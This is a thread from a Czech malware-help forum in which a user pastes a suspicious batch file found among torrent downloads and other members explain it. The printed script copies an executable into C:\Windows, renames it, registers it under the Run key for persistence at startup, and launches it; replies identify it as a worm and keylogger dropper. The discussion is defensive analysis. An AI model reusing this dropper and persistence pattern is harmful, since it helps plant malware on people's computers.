VIRY.CZ

Pomáháme v boji s počítačovou havěti!
https://forum.viry.cz:443/

Co to má dělat? (deivný .bat soubor ve složce od Torrentu)

https://forum.viry.cz:443/viewtopic.php?t=139121

Stránka 1 z 1

Co to má dělat? (deivný .bat soubor ve složce od Torrentu)

Napsal: 12 črc 2014 13:59
od ThatGuy
Dobrý den, našel jsem nějaký .bat soubor při svých stažených a otevřel jsem ho v notepadu++. Ukázal mi toto:

@echo off
XCOPY unistall.exe c:\windows\ /S /C /R /I /H /Y
RENAME c:\windows\unistall.exe winn.exe
reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winn /t REG_SZ /d c:\windows\winn.exe /f
start c:\windows\winn.exe

(Šel jsem tady jen proto, že jsem viděl "windows" a "uninstall")

Můžu vědět co to má jako dělat? (má to smazat Windows? [spouštět to raději nebudu])

Re: Co to má dělat? (deivný .bat soubor ve složce od Torrent

Napsal: 12 črc 2014 16:25
od Rudy
Zdravím!
Pravděpodobně to spouští šmejda. winn.exe je totiž worm a unistall.exe (pokud jste tedy nevynechal jedno písmenko) je keylogger.

Re: Co to má dělat? (deivný .bat soubor ve složce od Torrent

Napsal: 13 črc 2014 12:30
od Vrtule
Zdravím,

ten .bat soubor se pokusí provést následující:
1) zkopírovat soubor uinstall.exe do složky C:\Windows,
2) přejmenovat jej na winn.exe,
3) zapsat cestu k winn.exe do registru tak, aby došlo k jeho spuštění (toho souboru) po startu systému,
4) spustit winn.exe (aby nebylo nutné čekat na restart).
Všechny časy jsou v UTC+01:00
Stránka 1 z 1

Založeno na phpBB® Forum Software © phpBB Limited

Český překlad – phpBB.cz